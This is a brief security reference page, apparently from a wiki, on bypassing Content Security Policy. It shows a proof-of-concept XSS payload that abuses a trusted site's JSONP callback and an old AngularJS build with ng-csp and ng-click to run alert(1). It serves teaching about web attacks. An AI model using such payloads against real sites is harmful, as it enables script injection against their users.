CSP Bypass
Last updated
Was this helpful?
Last updated
Was this helpful?
: <script src="https://trustedsite/jsonp?callback=payload"> <script src="https://trustedsite/angularjs/1.1.3/angularjs.min.js"> <div ng-app ng-csp id=p ng-click=$event.view.alert(1)>
JSONP can be a serious security vulnerability. Another good read from my colleague :)
Articles: